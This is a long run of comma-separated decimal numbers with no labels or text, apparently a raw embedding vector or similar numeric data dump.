0.0017662178725004196, 0.0012927986681461334, 0.009963653981685638, -0.007290655747056007, 0.007698524743318558, 0.014202576130628586, 0.005396978929638863, -0.023831194266676903, 0.0019428395899012685, -0.007552857510745525, -0.017989929765462875, 0.023408759385347366, 0.05159541219472885, 0.004832517821341753, -0.006777178030461073, -0.011223677545785904, -0.017130492255091667, 0.019140703603625298, -0.022447355091571808, -0.015295082703232765, 0.007374414708465338, -0.0234233271330595, 0.00983983650803566, -0.030415363609790802, 0.05334341898560524, -0.010888641700148582, 0.011966581456363201, -0.0026438641361892223, -0.013466956093907356, -0.036096394062042236, 0.0028295903466641903, 0.020743045955896378, -0.00017320770712103695, -0.02690477855503559, -0.00015602349594701082, -0.007316147908568382, -0.014552178792655468, -0.024035129696130753, -0.012338032945990562, -0.006726194638758898, 0.012971686199307442, 0.0033558139111846685, 0.01220693252980709, 0.0198544729501009, -0.0032119674142450094, -0.008375878445804119, 0.028128385543823242, 0.004246206022799015, 0.012490984052419662, 0.00944653432816267, 0.035076722502708435, -0.009075081907212734, -0.016737191006541252, -0.006387517787516117, -0.010240421630442142, 0.03740740194916725, -0.017334425821900368, -0.047050587832927704, 0.0041660889983177185, -0.026132740080356598, 0.02418079786002636, -0.008281194604933262, -0.01599428616464138, -0.01444292813539505, -0.02809925191104412, 0.018339531496167183, -0.016460422426462173, 0.00007772724347887561, 0.0018226639367640018, 0.07429040223360062, 0.007217822130769491, 0.013707307167351246, 0.010874074883759022, -0.012796885333955288, 0.017203325405716896, 0.023000890389084816, -0.0014666891656816006, 0.00774222519248724, -0.03918454423546791, 0.009570351801812649, 0.020378876477479935, -0.005069227423518896, 0.01729072630405426, 0.008033559657633305, 0.032046839594841, -0.02871105447411537, -0.010298688896000385, 0.020102107897400856, 0.0009969116654247046, 0.01879110187292099, 0.003579777665436268, -0.0023288584779947996, -0.01756749488413334, 0.027268946170806885, -0.0004802473704330623, -0.011973864398896694, -0.016722623258829117, -0.028492553159594536, -0.00426441477611661, -0.005921381991356611, -0.018849369138479233, -0.010087471455335617, -0.01592145301401615, 0.003668998833745718, 0.0021995785646140575, 0.01558641716837883, 0.018354099243879318, -0.0053459955379366875, -0.020247776061296463, -0.004100538790225983, -0.02898782305419445, -0.020422575995326042, -0.002401692094281316, -0.012010280974209309, -0.012833302840590477, 0.005091077648103237, 0.01273861899971962, -0.03816487267613411, 0.0017043091356754303, -0.03315391018986702, -0.004177014343440533, 0.019038736820220947, 0.01892220228910446, 0.013976791873574257, 0.0019592272583395243, -0.01592145301401615, -0.020043840631842613, -0.006981112528592348, -0.010065620765089989, -0.009045949205756187, -0.006882787216454744, -0.00959948543459177, -0.018397798761725426, 0.0026165517047047615, -0.005757506005465984, -0.02206861972808838, 0.004606733098626137, -0.006984754465520382, 0.029920093715190887, -0.000009260694241675083, 0.028973255306482315, -0.010546323843300343, 0.010065620765089989, -0.01009475439786911, -0.02349616028368473, -0.014909063465893269, 0.026919344440102577, -0.01769859530031681, -0.005193044431507587, -0.005091077648103237, 0.01338683906942606, 0.005287728272378445, 0.020335176959633827, 0.010298688896000385, 0.02387489564716816, -0.025011101737618446, -0.006351100746542215, 0.005910456646233797, -0.010823091492056847, -0.018135597929358482, 0.006751686334609985, 0.013933091424405575, -0.0277642160654068, 0.005681030452251434, 0.041456956416368484, 0.008317611180245876, -0.0006163553916849196, -0.019155269488692284, -0.014726979658007622, 0.02565203793346882, 0.005342353601008654, 0.022447355091571808, -0.0014594057574868202, -0.02278238907456398, -0.01220693252980709, -0.004508407786488533, 0.011660679243505001, -0.006959262304008007, -0.008863864466547966, -0.0014621370937675238, -0.009606768377125263, 0.004060480277985334, -0.014974613673985004, -0.006726194638758898, 0.01831039786338806, -0.007327072788029909, 0.0018454245291650295, 0.009242599830031395, -0.04335063323378563, -0.028871288523077965, 0.00852882955223322, 0.01807733066380024, -0.03414444997906685, 0.011063442565500736, 0.001483987201936543, 0.01517854817211628, -0.030094895511865616, 0.020611943677067757, 0.015163981355726719, 0.026817377656698227, 0.005808489862829447, 0.019534004852175713, 0.012614801526069641, 0.006252775434404612, -0.007414473220705986, 0.0106410076841712, 0.007873325608670712, 0.0036453278735280037, 0.008215644396841526, 0.0032811593264341354, -0.00165423599537462, 0.01340140588581562, 0.010997892357409, 0.0012927986681461334, 0.00419522263109684, 0.0053205038420856, -0.008361311629414558, 0.01678089052438736, 0.020029274746775627, 0.016445854678750038, -0.02435559779405594, 0.00855796318501234, 0.026147307828068733, 0.0014056909130886197, -0.0006800849223509431, 0.003079045796766877, -0.009803419932723045, -0.025389837101101875, 0.01299353688955307, 0.02270955592393875, 0.005837623029947281, 0.011092576198279858, -0.008863864466547966, 0.004042271990329027, 0.057451244443655014, -0.002658430952578783, -0.014792529866099358, -0.018703700974583626, 0.02656974270939827, 0.020102107897400856, -0.0029242741875350475, -0.020233208313584328, 0.0027822484262287617, -0.00025173157337121665, 0.036649931222200394, 0.01560098398476839, 0.008018992841243744, 0.013947658240795135, -0.019927307963371277, 0.014217142947018147, 0.010480772703886032, 0.01599428616464138, 0.008638080209493637, -0.008470562286674976, 0.002913349075242877, -0.0007210538606159389, 0.005193044431507587, -0.0431758314371109, 0.021544216200709343, 0.021748149767518044, 0.019650539383292198, -0.01950487121939659, -0.01685372367501259, 0.009803419932723045, -0.052644215524196625, 0.006001499015837908, -0.01299353688955307, 0.0033030095510184765, -0.024880001321434975, -0.010189438238739967, -0.026205575093626976, 0.023102857172489166, 0.006773536559194326, 0.008091826923191547, -0.032250773161649704, -0.0024708842393010855, 0.015411616303026676, 0.007268805988132954, 0.004715983755886555, 0.009745152667164803, -0.03277517482638359, -0.0004675014642998576, -0.003148237708956003, 0.04821592569351196, -0.015630116686224937, -0.0017052196199074388, -0.025360703468322754, 0.0020156733226031065, 0.02336505986750126, -0.0005881323595531285, 0.005688313860446215, -0.00021531470702029765, 0.002454496454447508, -0.03213423863053322, 0.004461065866053104, 0.03000749461352825, -0.011850046925246716, 0.01347423903644085, 0.001882751821540296, -0.04492384195327759, -0.012716768309473991, 0.002427184022963047, 0.00014339140034280717, 0.000345732580171898, -0.019534004852175713, 0.021617049351334572, -0.009970936924219131, 0.01507658138871193, 0.017960796132683754, 0.002316112397238612, -0.019490305334329605, -0.01599428616464138, -0.01057545654475689, -0.00046841189032420516, -0.0003216064069420099, 0.02356899343430996, 0.015295082703232765, 0.0036598946899175644, 0.0063620260916650295, -0.01882023550570011, -0.006748044863343239, 0.0030699416529387236, -0.012381733395159245, -0.008324895054101944, -0.007185047026723623, -0.007531007286161184, -0.02364182658493519, -0.011354777961969376, -0.013219321146607399, 0.0454191118478775, -0.023743795230984688, 0.013612623326480389, 0.029890961945056915, -0.04471990838646889, 0.010772108100354671, -0.033445246517658234, -0.01507658138871193, -0.0013374092523008585, -0.0013428718084469438, -0.010706557892262936, -0.0018863935256376863, 0.0008257523877546191, -0.02288435585796833, 0.0004529347352217883, 0.0020520901307463646, 0.003020778764039278, 0.0030808665324002504, -0.026744544506072998, 0.011981148272752762, 0.001421168097294867, 0.04978913441300392, 0.023831194266676903, -0.026453210040926933, 0.0022887997329235077, -0.006897354032844305, -0.018121030181646347, 0.0201603751629591, -0.026424076408147812, -0.01766946166753769, 0.0018663642695173621, -0.02865278720855713, 0.007276089396327734, -0.03318304568529129, 0.016839157789945602, -0.0028732905630022287, -0.03399878367781639, 0.01483623031526804, 0.021777283400297165, -0.013707307167351246, -0.0024162589106708765, 0.02059737779200077, 0.021369414404034615, 0.003508764784783125, 0.005462529603391886, -0.022593021392822266, -0.021733583882451057, -0.015819484367966652, -0.01670805737376213, 0.0010233138455078006, 0.004672283306717873, -0.004748758859932423, -0.0388932079076767, 0.005458887666463852, -0.005761147942394018, -0.0037764287553727627, -0.04722538962960243, -0.007345281075686216, -0.02565203793346882, 0.013903958722949028, -0.012243349105119705, -0.01350337266921997, -0.02560833841562271, -0.013459672220051289, -0.014377377927303314, 0.0021613407880067825, -0.0072251055389642715, 0.008536112494766712, -0.01412245910614729, -0.026234708726406097, 0.026278408244252205, -0.004730550572276115, 0.02534613572061062, 0.008310328237712383, -0.017174191772937775, 0.012155949138104916, 0.008179227821528912, -0.008164661005139351, 0.00943196751177311, -0.006077974569052458, -0.04119475558400154, 0.013510656543076038, 0.0009117872104980052, -0.009075081907212734, 0.020408010110259056, 0.008689063601195812, 0.012745901942253113, 0.007308864500373602, -0.005163911264389753, -0.02356899343430996, -0.022593021392822266, 0.003425006056204438, 0.0015741188544780016, 0.008332177996635437, 0.0013283051084727049, 0.018193865194916725, 0.014042342081665993, 0.023408759385347366, 0.03335784748196602, -0.01549901720136404, -0.005218536593019962, -0.00881288107484579, -0.0004174282948952168, 0.002068477915599942, 0.017815129831433296, -0.01034967228770256, -0.022942623123526573, 0.010888641700148582, 0.011107143014669418, 0.004384590312838554, 0.02687564492225647, 0.0023070082534104586, 0.0037873536348342896, -0.00363622372969985, -0.002512763487175107, 0.007902459241449833, 0.020611943677067757, -0.023583561182022095, -0.009417400695383549, 0.022185152396559715, -0.02721068076789379, -0.0072724474593997, -0.019737940281629562, 0.0014903601258993149, -0.007276089396327734, 0.011165410280227661, 0.0008357670158147812, -0.009067798964679241, -0.016343887895345688, -0.017378127202391624, 0.021063514053821564, 0.01637302152812481, 0.0019137061899527907, 0.041660889983177185, 0.00636930949985981, 0.009490234777331352, -0.02471976727247238, 0.01576121896505356, -0.01415159273892641, -0.0019410187378525734, 0.010837658308446407, -0.022389087826013565, -0.013073653914034367, 0.01691199094057083, 0.018907634541392326, 0.0010142095852643251, -0.01113627664744854, -0.021296581253409386, 0.024952834472060204, -0.018630867823958397, 0.023685527965426445, -0.0036944907624274492, -0.008324895054101944, -0.019388338550925255, -0.025972506031394005, -0.008448712527751923, -0.0039730798453092575, 0.022971756756305695, 0.03583419322967529, -0.02605990692973137, 0.007771358359605074, -0.0037145200185477734, -0.0036999532021582127, -0.022549321874976158, -0.013124637305736542, 0.01267306786030531, -0.021194614470005035, 0.0004675014642998576, -0.02186468429863453, 0.012287049554288387, 0.010764824226498604, -0.011507729068398476, 0.011027025990188122, -0.009111499413847923, 0.007250597234815359, 0.004439215641468763, 0.0019810772500932217, -0.011930163949728012, -0.0032520259264856577, -0.0005721999332308769, 0.003965796437114477, 0.004985468462109566, 0.004555749706923962, -0.010495339520275593, 0.0007638437091372907, -0.000022902791897649877, -0.016999391838908195, -0.009118782356381416, -0.022694988176226616, -0.008295761421322823, 0.019767073914408684, -0.020335176959633827, 0.008244778029620647, 0.004628583323210478, 0.005702880676835775, -0.012119531631469727, -0.010706557892262936, 0.004475632682442665, 0.010844942182302475, -0.0036598946899175644, 0.013102787546813488, -0.018747400492429733, 0.01616908796131611, -0.010648290626704693, 0.018951335921883583, 0.0018681851215660572, 0.0014830767177045345, 0.006212716922163963, -0.0069556208327412605, -0.019024169072508812, 0.009264449588954449, 0.003740011714398861, 0.009082365781068802, 0.008980398066341877, 0.020684778690338135, -0.005531721282750368, -0.022024918347597122, -0.016052553430199623, 0.004817951004952192, 0.002206861972808838, 0.00445014052093029, 0.024064263328909874, 0.0014020492089912295, 0.007785925175994635, -0.004901709966361523, -0.0004092344897799194, 0.005233103409409523, -0.002281516557559371, 0.010517190210521221, -0.008914847858250141, -0.00970145221799612, -0.01820843107998371, -0.0049672601744532585, 0.006169016472995281, 0.01998557522892952, -0.005724730901420116, 0.0034814521204680204, 0.01128922775387764, 0.030531898140907288, 0.00855796318501234, 0.007909742183983326, -0.00491991825401783, -0.012046698480844498, -0.014413794502615929, -0.010619156993925571, 0.0066642859019339085, -0.015615550801157951, 0.004599449690431356, 0.018572600558400154, -0.0066642859019339085, 0.0035688525531440973, -0.0059614405035972595, -0.009220750071108341, 0.0016314754029735923, 0.005808489862829447, 0.009060515090823174, 0.020845012739300728, 0.004129672423005104, 0.0042207143269479275, -0.0007456352468580008, -0.007866042666137218, 0.006048840936273336, 0.02308829128742218, -0.03376571461558342, -0.007305222563445568, 0.013117354363203049, -0.0013182904804125428, -0.01268763467669487, -0.007367131300270557, -0.00370905757881701, -0.008579812943935394, 0.015163981355726719, -0.008273911662399769, -0.017815129831433296, 0.01300810370594263, -0.01944660395383835, 0.031668104231357574, -0.012629368342459202, -0.0024326464626938105, 0.00013758745626546443, 0.014916347339749336, -0.014719695784151554, -0.004253489430993795, 0.020029274746775627, -0.004406440537422895, -0.010961475782096386, 0.017232459038496017, -0.03341611474752426, -0.01756749488413334, 0.0055062295868992805, 0.009126066230237484, 0.014719695784151554, 0.002063015243038535, -0.00604519946500659, -0.00040832406375557184, -0.00006395711534423754, -0.008565246127545834, 0.00785875879228115, -0.006853653583675623, -0.0018517974531278014, 0.0001883434597402811, 0.024515831843018532, 0.014581311494112015, 0.012818736024200916, 0.003233817405998707, 0.02052454464137554, -0.006784461438655853, -0.01838323287665844, -0.005779356230050325, -0.030706698074936867, 0.005997857544571161, -0.008354028686881065, -0.012155949138104916, -0.004639508202672005, -0.0017716804286465049, -0.013889391906559467, 0.01807733066380024, -0.006522260140627623, -0.0013374092523008585, 0.018164731562137604, 0.01739269308745861, 0.008740046992897987, -0.006289192009717226, 0.005812131334096193, -0.02247648872435093, -0.012964403256773949, -0.0028860364109277725, 0.0006878235144540668, 0.008652647025883198, -0.004854368045926094, -0.0031937588937580585, -0.0011689813109114766, -0.024122530594468117, 0.021573349833488464, -0.006311042234301567, -0.008907564915716648, -0.045477379113435745, -0.002547359559684992, -0.008077260106801987, 0.015149414539337158, 0.011230960488319397, 0.024748900905251503, 0.01268763467669487, 0.01128922775387764, -0.017028525471687317, -0.0010724766179919243, 0.012119531631469727, 0.0031227460131049156, 0.012061265297234058, 0.00025446282234042883, 0.0020375235471874475, -0.008842014707624912, -0.004959976766258478, -0.0012445462634786963, -0.003925737924873829, 0.01034967228770256, -0.020888712257146835, -0.017101358622312546, -0.005666464101523161, -0.011675246059894562, 0.005979648791253567, -0.020932413637638092, 0.002008389914408326, -0.007399906404316425, 0.009759719483554363, 0.016795456409454346, 0.011019743047654629, -0.010597307235002518, -0.018091898411512375, 0.019126135855913162, 0.003565210849046707, -0.019009603187441826, 0.006999321281909943, 0.001482166349887848, 0.0038128455635160208, 0.004785175900906324, -0.01657695509493351, 0.015877751633524895, -0.02710871212184429, -0.02425363101065159, -0.004679566714912653, -0.002551001263782382, -0.008441428653895855, -0.02469063363969326, -0.03379485011100769, 0.004031346645206213, 0.015950586646795273, -0.010735691525042057, 0.012236066162586212, 0.026759110391139984, 0.003272055182605982, 0.005943232215940952, -0.007953442633152008, -0.004938126541674137, 0.0025455388240516186, -0.004672283306717873, -0.0022869789972901344, 0.019694238901138306, 0.0032101464457809925, 0.015062014572322369, -0.0015641042264178395, 0.00298800365999341, -0.024748900905251503, 0.013212038204073906, 0.010597307235002518, -0.016081687062978745, 0.0052695199847221375, 0.0054297540336847305, -0.01203941460698843, 0.012563818134367466, 0.02565203793346882, 0.006704344414174557, -0.028055550530552864, -0.01365632377564907, -0.0037764287553727627, -0.0010132992174476385, -0.0017261593602597713, 0.003279338590800762, 0.018703700974583626, 0.006085257977247238, -0.020713912323117256, 0.0064166514202952385, -0.0008171033696271479, -0.0038310540840029716, 0.017145058140158653, -0.0113037945702672, -0.009810702875256538, -0.009614052250981331, -0.012614801526069641, 0.00394030474126339, 0.004158805590122938, 0.012126815505325794, 0.009344566613435745, 0.0061544496566057205, 0.011158126406371593, -0.04393330216407776, -0.01787339709699154, 0.00157502933871001, -0.023102857172489166, 0.031085433438420296, 0.004413723945617676, 0.010298688896000385, -0.0017771428683772683, 0.005193044431507587, -0.0059068151749670506, 0.008273911662399769, 0.0073125059716403484, 0.0046431501396000385, 0.01831039786338806, -0.007618407718837261, 0.010961475782096386, -0.010721124708652496, 0.025666605681180954, -0.0006382054998539388, -0.014421077445149422, 0.021646182984113693, -0.011660679243505001, 0.012767751701176167, 0.02690477855503559, -0.007909742183983326, -0.0031609837897121906, 0.0018845726735889912, -0.0005863115075044334, -0.019694238901138306, 0.007006604224443436, 0.007822342216968536, 0.02420992963016033, 0.0033212178386747837, -0.019257236272096634, -0.0024362881667912006, 0.00946110114455223, 0.01721789315342903, 0.016431288793683052, -0.014916347339749336, -0.000021665187887265347, -0.004129672423005104, 0.018121030181646347, -0.027239812538027763, -0.0012518296716734767, -0.02520046941936016, 0.01766946166753769, 0.013241170905530453, -0.015295082703232765, 0.0013974971370771527, 0.008281194604933262, 0.009650468826293945, 0.003889320883899927, -0.02021864242851734, -0.014566745609045029, 0.02090328000485897, -0.014552178792655468, 0.014370094053447247, -0.014311826787889004, -0.0032684134785085917, 0.030502764508128166, -0.011981148272752762, -0.013787424191832542, 0.025054801255464554, 0.007800491992384195, 0.00920618325471878, 0.01586318574845791, 0.02247648872435093, -0.00347416871227324, 0.008470562286674976, 0.02158791571855545, 0.024544965475797653, 0.0058631147257983685, 0.006442143116146326, -0.010691991075873375, -0.015265949070453644, -0.00654046842828393, 0.017334425821900368, 0.019432038068771362, -0.008463279344141483, 0.007909742183983326, 0.017815129831433296, -0.007068512961268425, -0.014326393604278564, 0.004380948841571808, -0.023350492119789124, -0.006915562320500612, -0.00242172135040164, -0.008703630417585373, 0.004486557561904192, 0.01333585474640131, 0.007104930002242327, -0.0026857436168938875, -0.002978899283334613, 0.021442249417304993, -0.002836873522028327, 0.009169765748083591, -0.008842014707624912, 0.02026234194636345, -0.004537540953606367, -0.00970145221799612, -0.011522295884788036, 0.01468327920883894, 0.01026227232068777, -0.0011143559822812676, -0.010160304605960846, -0.003548823297023773, -0.03178463876247406, -0.007509157061576843, 0.006584168877452612, 0.018747400492429733, 0.013328571803867817, 0.010284122079610825, 0.011362060904502869, -0.0019992857705801725, -0.0038929625879973173, -0.014617729000747204, -0.0005148433847352862, -0.006598735693842173, 0.019417472183704376, -0.003241100814193487, 0.013605340383946896, -0.032279908657073975, -0.009067798964679241, 0.03236730769276619, -0.0060706911608576775, 0.0004456513561308384, -0.023510726168751717, 0.024603232741355896, -0.0000025783424462133553, 0.01762576214969158, -0.027225246652960777, -0.013940375298261642, -0.029585059732198715, 0.0009896282572299242, -0.028040984645485878, -0.006238208618015051, 0.004180655814707279, -0.0023907669819891453, -0.011988431215286255, -0.021340280771255493, -0.014668712392449379, -0.025389837101101875, -0.016533255577087402, -0.003002570243552327, -0.015877751633524895, -0.022738689556717873, 0.003548823297023773, 0.009817985817790031, -0.000057328106777276844, -0.010378805920481682, -0.020611943677067757, 0.0039949300698935986, 0.00045270711416378617, -0.0009158840985037386, -0.01478524599224329, 0.00759655749425292, -0.006802670191973448, -0.009716019034385681, 0.007236030884087086, 0.010218571871519089, 0.01008018758147955, 0.005378770641982555, -0.020743045955896378, -0.019024169072508812, -0.006467634811997414, 0.012126815505325794, -0.0022359953727573156, 0.01681002415716648, -0.003110000165179372, 0.006937412545084953, -0.01478524599224329, 0.0006664285901933908, 0.015455316752195358, -0.01347423903644085, -0.017654895782470703, 0.028492553159594536, -0.0060706911608576775, -0.008368595503270626, 0.010677424259483814, 0.005739297717809677, -0.008069977164268494, -0.007228747475892305, 0.008201077580451965, -0.0314350351691246, 0.006496768444776535, 0.007669391110539436, -0.0011571458308026195, -0.004169730935245752, 0.01074297446757555, 0.00445014052093029, -0.008616229519248009, 0.0050437357276678085, 0.01415159273892641, -0.004908992908895016, -0.023131990805268288, -0.0290897898375988, 0.00007345963967964053, -0.01886393502354622, 0.018980469554662704, 0.010444356128573418, -0.006482201628386974, -0.006438501179218292, 0.0004467893741093576, 0.00014043253031559289, -0.0005385143449530005, -0.015455316752195358, 0.0031555211171507835, -0.0013091862201690674, 0.008368595503270626, -0.005600913427770138, 0.012396300211548805, 0.007396264933049679, -0.004799742717295885, 0.03714520111680031, -0.002030240138992667, 0.012425433844327927, 0.026380375027656555, 0.013263021595776081, -0.006442143116146326, -0.008412295021116734, 0.008303044363856316, -0.013059087097644806, 0.008142810314893723, -0.006343817338347435, 0.0073015810921788216, 0.01468327920883894, -0.001591416890732944, 0.000992359477095306, 0.006646077614277601, 0.00701752956956625, 0.008186510764062405, 0.02182098478078842, -0.0027949942741543055, -0.013190187513828278, 0.000019517163309501484, 0.015207681804895401, 0.0106410076841712, 0.00014555365487467498, 0.01838323287665844, -0.02527330256998539, 0.01947573758661747, -0.00014430182636715472, -0.006493126507848501, 0.0070940051227808, -0.004085971973836422, -0.005193044431507587, 0.005087435711175203, 0.007953442633152008, -0.0003796457895077765, -0.0111508434638381, -0.030677564442157745, -0.004858009517192841, 0.009876253083348274, 0.017348993569612503, 0.011653396300971508, -0.008288477547466755, -0.000049219666834687814, -0.020509976893663406, 0.00003300278331153095, -0.018368665128946304, -0.00003846531035378575, -0.02855082042515278, 0.032716911286115646, 0.004184297751635313, -0.01988360658288002, -0.010786674916744232, 0.004227997735142708, 0.01008018758147955, 0.010808524675667286, 0.012483700178563595, -0.014974613673985004, -0.03501845523715019, 0.003658073954284191, 0.015207681804895401, 0.01557185035198927, 0.0015959689626470208, -0.0017279800958931446, -0.0009268091525882483, -0.01970880664885044, -0.00001873476867331192, 0.030648432672023773, -0.005768430884927511, -0.004224356263875961, -0.02814295142889023, 0.01592145301401615, -0.0032829802948981524, -0.004246206022799015, -0.004366382025182247, 0.002277874853461981, -0.011194543913006783, -0.019155269488692284, -0.0033722014632076025, 0.01220693252980709, 0.04198135808110237, -0.018849369138479233, -0.005517154932022095, -0.019635971635580063, 0.03836880624294281, -0.014355527237057686, 0.018368665128946304, -0.02115091308951378, 0.024472132325172424, 0.014639578759670258, 0.00048662032349966466, -0.0277642160654068, 0.022520188242197037, -0.026453210040926933, 0.007793208584189415, 0.020961545407772064, -0.0029406617395579815, -0.009213466197252274, -0.001032418105751276, -0.019038736820220947, -0.0050218855030834675, -0.0034286475274711847, 0.008062693290412426, 0.0026311182882636786, -0.01275318581610918, 0.016445854678750038, -0.018645433709025383, 0.0027421896811574697, -0.019038736820220947, 0.01560098398476839, 0.004923559725284576, 0.007006604224443436, -0.007075796369463205, 0.008536112494766712, 0.01831039786338806, -0.00840501207858324, -0.029759859666228294, 0.0039949300698935986, -0.002185011748224497, -0.01445749495178461, 0.03618379682302475, 0.010524473153054714, 0.003929379396140575, 0.009009531699120998, 0.007632974535226822, 0.01780056208372116, 0.006012423895299435, 0.01430454384535551, -0.004894426558166742, 0.003965796437114477, 0.010925059206783772, 0.011165410280227661, 0.00852882955223322, -0.017334425821900368, -0.052061546593904495, 0.012155949138104916, 0.003780070459470153, 0.010291405022144318, -0.023583561182022095, -0.012804169207811356, 0.00411874707788229, 0.003350351471453905, -0.007552857510745525, -0.00809910986572504, -0.009817985817790031, -0.013000819832086563, 0.0027021311689168215, 0.010386088863015175, 0.019388338550925255, 0.020728478208184242, 0.00985440332442522, 0.0059068151749670506, -0.023933162912726402, -0.0204662773758173, 0.00492720166221261, -0.006930129136890173, 0.01075754128396511, -0.002805919386446476, 0.004147880710661411, 0.010539039969444275, -0.015018314123153687, 0.010823091492056847, 0.0022032202687114477, 0.019737940281629562, 0.00006213627057150006, -0.001077028689906001, 0.0007033006404526532, -0.021952085196971893, -0.025564637035131454, -0.0027185187209397554, 0.0058012064546346664, -0.01889306865632534, -0.03117283433675766, -0.0056154802441596985, 0.029322858899831772, 0.013073653914034367, 0.0015194936422631145, -0.004104180261492729, -0.007815058343112469, -0.005735655780881643, 0.018019063398241997, 0.018528899177908897, -0.008834730833768845, 0.0022669497411698103, -0.01944660395383835, -0.005407904274761677, -0.010451640002429485, -0.029890961945056915, 0.02052454464137554, -0.0008252971456386149, 0.01810646429657936, -0.03662079572677612, -0.022767823189496994, 0.030735831707715988, 0.010386088863015175, 0.04069948568940163, -0.019417472183704376, 0.0022560246288776398, -0.029512226581573486, 0.00347416871227324, -0.0067953867837786674, -0.009111499413847923, -0.0048907846212387085, -0.007137705106288195, -0.008208360522985458, -0.0036853866185992956, -0.01688285730779171, 0.015309649519622326, 0.011857330799102783, -0.020728478208184242, 0.005589988548308611, -0.025695739313960075, -0.02115091308951378, -0.024530399590730667, 0.030124029144644737, -0.010160304605960846, 0.0272543802857399, -0.0113037945702672, 0.01950487121939659, -0.00394030474126339, 0.03784440457820892, -0.0027986359782516956, -0.008310328237712383, -0.020684778690338135, -0.02404969558119774, 0.0006477649440057576, -0.00024217214377131313, -0.017611194401979446, 0.0026566102169454098, -0.020859578624367714, -0.010830375365912914, 0.021646182984113693, -0.015265949070453644, 0.0038092038594186306, -0.007370773237198591, -0.0070648714900016785, 0.0015222248621284962, 0.00895126536488533, -0.012884286232292652, 0.0023652752861380577, 0.01685372367501259, -0.004071405157446861, -0.02425363101065159, -0.008820164017379284, 0.016212787479162216, -0.006260058842599392, 0.007480023428797722, 0.024880001321434975, -0.013226605020463467, 0.01139119453728199, 0.032658644020557404, -0.00014555365487467498, -0.0023051875177770853, 0.004453782457858324, -0.004151522181928158, 0.013059087097644806, -0.00020939696696586907, 0.008426861837506294, 0.005462529603391886, 0.01685372367501259, -0.018601734191179276, -0.00001327223981206771, -0.002296083141118288, 0.0018326786812394857, 0.0018372307531535625, 0.016664355993270874, 0.013394122011959553, 0.007374414708465338, 0.009577634744346142, -0.009752435609698296, 0.014960046857595444, 0.01817929744720459, -0.006041557528078556, -0.004905351437628269, -0.009082365781068802, 0.0015559104504063725, -0.0006313773337751627, -0.011201826855540276, 0.00840501207858324, 0.0060998243279755116, 0.020859578624367714, -0.012622084468603134, -0.012185082770884037, 0.001753471908159554, -0.0018845726735889912, 0.010072904638946056, -0.002296083141118288, -0.03656253218650818, -0.009140633046627045, -0.002277874853461981, 0.03831053897738457, 0.004206147510558367, -0.014340960420668125, 0.0017671282403171062, -0.0015641042264178395, 0.027166979387402534, -0.015324216336011887, -0.003548823297023773, -0.011901031248271465, 0.002765860641375184, -0.002785889897495508, 0.014581311494112015, 0.005127494223415852, 0.01026227232068777, 0.021296581253409386, 0.010000070556998253, -0.024574099108576775, -0.006544110365211964, -0.0012199649354442954, 0.009781569242477417, 0.005826698150485754, -0.007290655747056007, -0.004639508202672005, -0.021719016134738922, -0.01627105474472046, -0.01820843107998371, -0.008244778029620647, -0.00018697783525567502, -0.018033631145954132, 0.009978220798075199, -0.003108179196715355, 0.05340168625116348, -0.010917775332927704, -0.00895126536488533, -0.00451933266595006, 0.015979720279574394, 0.0033394263591617346, -0.012097681872546673, 0.026438642293214798, 0.0006691598682664335, 0.0016733548836782575, 0.017276160418987274, -0.019592272117733955, -0.020043840631842613, 0.02329222485423088, 0.018354099243879318, -0.0034268267918378115, 0.005874040070921183, 0.013168337754905224, 0.007487306836992502, 0.006445784587413073, 0.027531148865818977, 0.005156627856194973, 0.006897354032844305, -0.002731264801695943, -0.0034504977520555258, 0.002459959127008915, 0.004930843133479357, 0.008703630417585373, 0.0020921488758176565, -0.014523045159876347, 0.003110000165179372, 0.0013192008482292295, 0.024632366374135017, -0.004457423929125071, -0.024603232741355896, 0.00798257626593113, -0.0008212002576328814, -0.008674496784806252, -0.0032993678469210863, 0.01558641716837883, -0.02705044485628605, 0.010240421630442142, 0.017858829349279404, 0.019140703603625298, -0.006347459275275469, 0.008128243498504162, 0.005793923046439886, 0.007268805988132954, -0.015513584017753601, -0.02359812706708908, -0.018121030181646347, 0.007545574102550745, 0.007618407718837261, -0.01678089052438736, -0.0017953513888642192, -0.001259113079868257, -0.02090328000485897, 0.014741546474397182, -0.00045088629121892154, 0.0077349417842924595, 0.014326393604278564, -0.0003942125476896763, 0.015848618000745773, -0.004173372406512499, -0.009526651352643967, 0.0033357846550643444, 0.018135597929358482, -0.009570351801812649, -0.006336533930152655, -0.02359812706708908, -0.02367096021771431, -0.018732834607362747, 0.005659180693328381, -0.013583489693701267, -0.009883536957204342, 0.028492553159594536, -0.0035724942572414875, 0.0017316217999905348, 0.01169709675014019, -0.021427681669592857, 0.005779356230050325, -0.004089613910764456, 0.013146487064659595, -0.00919161643832922, 0.0059068151749670506, -0.012418149970471859, -0.005910456646233797, 0.00387475430034101, 0.0037327285390347242, 0.010961475782096386, -0.018907634541392326, 0.000764298893045634, 0.010772108100354671, 0.02700674533843994, -0.030531898140907288, 0.004155164118856192, 0.006569602061063051, -0.028623653575778008, -0.003510585520416498, -0.019534004852175713, 0.0029224532190710306, 0.011740796267986298, 0.0007893355214037001, 0.010123888030648232, 0.013598056510090828, 0.0048143090680241585, 0.01807733066380024, 0.009978220798075199, -0.0028477986343204975, 0.021223748102784157, 0.027341781184077263, 0.010830375365912914, -0.025491803884506226, -0.01362719014286995, -0.003987646661698818, 0.00387475430034101, -0.0019264520378783345, -0.011748080141842365, -0.0020120316185057163, 0.022156018763780594, 0.022243419662117958, -0.013721873983740807, 0.010844942182302475, 0.012338032945990562, -0.006383875850588083, -0.013102787546813488, 0.015440749935805798, 0.0029406617395579815, -0.0009623155929148197, -0.00823749415576458, -0.0012035772670060396, 0.019082436338067055, 0.02868192084133625, -0.012578384019434452, -0.012898853048682213, 0.036708198487758636, 0.001204487751238048, 0.014253560453653336, 0.004034988582134247, 0.0006714359042234719, 0.05238201469182968, 0.014450211077928543, -0.019534004852175713, -0.008106393739581108, -0.0033849473111331463, -0.001473972573876381, 0.013423255644738674, 0.006318325642496347, 0.005925023462623358, -0.006449426524341106, -0.023146558552980423, -0.0013410509563982487, -0.004770609084516764, -0.006737119518220425, -0.0010606411378830671, -0.02326309122145176, -0.008536112494766712, -0.00953393429517746, 0.016693489626049995, 0.006431217771023512, 0.009096932597458363, 0.019635971635580063, -0.04413723945617676, -0.00525131169706583, 0.019330071285367012, 0.015557283535599709, 0.0036052693612873554, 0.001566835562698543, 0.012148665264248848, 0.005378770641982555, 0.012250632978975773, 0.0009422863367944956, 0.0003266137500759214, -0.0008048126474022865, 0.015732085332274437, 